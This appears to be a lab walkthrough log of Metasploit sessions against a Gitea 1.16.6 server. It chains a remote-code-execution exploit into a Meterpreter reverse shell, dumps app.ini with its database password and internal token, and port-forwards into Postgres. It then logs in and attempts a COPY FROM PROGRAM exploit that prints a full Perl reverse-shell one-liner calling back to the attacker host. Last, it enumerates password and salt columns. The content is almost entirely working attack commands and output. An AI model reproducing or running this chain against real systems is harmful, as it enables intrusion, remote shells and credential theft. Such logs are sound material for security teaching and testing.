manually create account in gitea (demo_user:demo_user) assuming ALLOW_LOCALNETWORKS is enabled (scenario: same network originally had a different git server, thus migration is now desired) ```sh msf6 > use exploit/multi/http/gitea_git_fetch_rce [*] Using configured payload linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/http/gitea_git_fetch_rce) > set LHOST 192.168.56.20 LHOST => 192.168.56.20 msf6 exploit(multi/http/gitea_git_fetch_rce) > set RHOSTS 192.168.56.10 RHOSTS => 192.168.56.10 msf6 exploit(multi/http/gitea_git_fetch_rce) > set RPORT 3000 RPORT => 3000 msf6 exploit(multi/http/gitea_git_fetch_rce) > set SSL false SSL => false msf6 exploit(multi/http/gitea_git_fetch_rce) > set username demo_user username => demo_user msf6 exploit(multi/http/gitea_git_fetch_rce) > set password demo_user password => demo_user msf6 exploit(multi/http/gitea_git_fetch_rce) > run [*] Started reverse TCP handler on 192.168.56.20:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Version detected: 1.16.6 [*] Using URL: http://192.168.56.20:8080/ [*] Using URL: http://192.168.56.20:8080/6usOy2 [*] Client 192.168.56.10 (curl/7.79.1) requested /6usOy2 [*] Sending payload to 192.168.56.10 (curl/7.79.1) [*] Sending stage (3045380 bytes) to 192.168.56.10 [*] Meterpreter session 1 opened (192.168.56.20:4444 -> 192.168.56.10:48350) at 2025-05-19 07:35:34 -0400 [*] Command Stager progress - 100.00% done (112/112 bytes) meterpreter > sysinfo Computer : 172.18.0.2 OS : (Linux 5.15.0-135-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux ``` shell commands have been prefixed with a `>` for readability, this symbol is not present in the original ```sh meterpreter > shell Process 172 created. Channel 1 created. > env USER=git SHLVL=1 HOME=/data/git PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin LANG=C PWD=/data/git/repositories/demo_user/wssbr3glpme5a.git > ls /data git gitea ssh > ls /data/gitea attachments avatars conf indexers jwt log queues repo-archive repo-avatars > ls /data/gitea/conf app.ini > cat /data/gitea/conf/app.ini APP_NAME = Gitea: Git with a cup of tea RUN_MODE = prod [repository] ROOT = /data/git/repositories [repository.local] LOCAL_COPY_PATH = /data/gitea/tmp/local-repo [repository.upload] TEMP_PATH = /data/gitea/uploads [server] APP_DATA_PATH = /data/gitea DOMAIN = localhost SSH_DOMAIN = localhost HTTP_PORT = 3000 ROOT_URL = https://gitea.vm.local/ DISABLE_SSH = false SSH_PORT = 22 SSH_LISTEN_PORT = 22 LFS_START_SERVER = false LFS_CONTENT_PATH = /data/git/lfs [database] PATH = /data/gitea/gitea.db DB_TYPE = postgres HOST = postgres:5432 NAME = gitea USER = gitea PASSWD = gitea LOG_SQL = false ... [log] MODE = console LEVEL = info ROUTER = console ROOT_PATH = /data/gitea/log [security] INSTALL_LOCK = true SECRET_KEY = REVERSE_PROXY_LIMIT = 1 REVERSE_PROXY_TRUSTED_PROXIES = * INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3NDc2NTQxMTB9.qXWoxugJwfYRPl1mm8pQ_Z1dreWr2A2I4Aol5edV8o4 [service] DISABLE_REGISTRATION = false REQUIRE_SIGNIN_VIEW = false [migrations] ALLOW_LOCALNETWORKS = true ``` for demonstration purposes, database setup ```sh meterpreter > resolve postgres Host resolutions ================ Hostname IP Address -------- ---------- postgres 172.18.0.1 meterpreter > portfwd add -l 5432 -p 5432 -r 172.18.0.1 [*] Forward TCP relay created: (local) :5432 -> (remote) 172.18.0.1:5432 meterpreter > background [*] Backgrounding session 1... msf6 > use auxiliary/scanner/postgres/postgres_login [*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session msf6 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 127.0.0.1 RHOSTS => 127.0.0.1 msf6 auxiliary(scanner/postgres/postgres_login) > set USERNAME gitea USERNAME => gitea msf6 auxiliary(scanner/postgres/postgres_login) > set PASSWORD gitea PASSWORD => gitea msf6 auxiliary(scanner/postgres/postgres_login) > set DATABASE gitea DATABASE => gitea msf6 auxiliary(scanner/postgres/postgres_login) > set STOP_ON_SUCCESS true STOP_ON_SUCCESS => true msf6 auxiliary(scanner/postgres/postgres_login) > run [!] No active DB -- Credential data will not be saved! [+] 127.0.0.1:5432 - Login Successful: gitea:gitea@gitea [*] PostgreSQL session 2 opened (127.0.0.1:45027 -> 127.0.0.1:5432) at 2025-05-19 07:55:46 -0400 [*] Scanned 1 of 1 hosts (100% complete) [*] Bruteforce completed, 1 credential was successful. [*] 1 Postgres session was opened successfully. [*] Auxiliary module execution completed ``` ```sh msf6 > use auxiliary/scanner/postgres/postgres_version [*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST msf6 auxiliary(scanner/postgres/postgres_version) > set SESSION 2 SESSION => 2 msf6 auxiliary(scanner/postgres/postgres_version) > run [*] 127.0.0.1:5432 Postgres - Version PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit (Post-Auth) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ``` ```sh msf6 > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec [*] Using configured payload cmd/unix/reverse_perl [*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set SESSION 2 SESSION => 2 msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LHOST 192.168.56.20 LHOST => 192.168.56.20msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run [*] Started reverse TCP handler on 192.168.56.20:4444 [*] : - PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit [*] Exploiting... [+] 127.0.0.1:5432 - gqBG2W1VfJT dropped successfully [+] 127.0.0.1:5432 - gqBG2W1VfJT created successfully [!] 127.0.0.1:5432 - Unable to execute query: COPY "gqBG2W1VfJT" FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.56.20:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'''; [-] Insufficient permissions, User must be superuser or in pg_read_server_files group [-] Exploit Failed ``` most explots require superuser unfortunately, as shown ```sh msf6 > use auxiliary/admin/postgres/postgres_sql [*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST msf6 auxiliary(admin/postgres/postgres_sql) > set SESSION 2 SESSION => 2 msf6 auxiliary(admin/postgres/postgres_sql) > set SQL 'SELECT version();' SQL => SELECT version(); msf6 auxiliary(admin/postgres/postgres_sql) > run Query Text: 'SELECT version();' =============================== version ------- PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), compiled by gcc (U buntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit [*] Auxiliary module execution completed msf6 auxiliary(admin/postgres/postgres_sql) > set SQL "SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'user';" SQL => SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'user'; msf6 auxiliary(admin/postgres/postgres_sql) > run Query Text: 'SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'user';' ================================================================================================================================== column_name data_type ----------- --------- allow_create_organization boolean allow_git_hook boolean allow_import_local boolean avatar character varying ... login_name character varying login_source bigint login_type integer ... passwd character varying passwd_hash_algo character varying ... salt character varying ... [*] Auxiliary module execution completed ``` log:insecure:nmap log:insecure:gitea_rce log:insecure:gitea:shell log:insecure:postgres_session log:insecure:postgres_exploit_version log:insecure:postgres_exploit_rce log:insecure:postgres_exploit_sql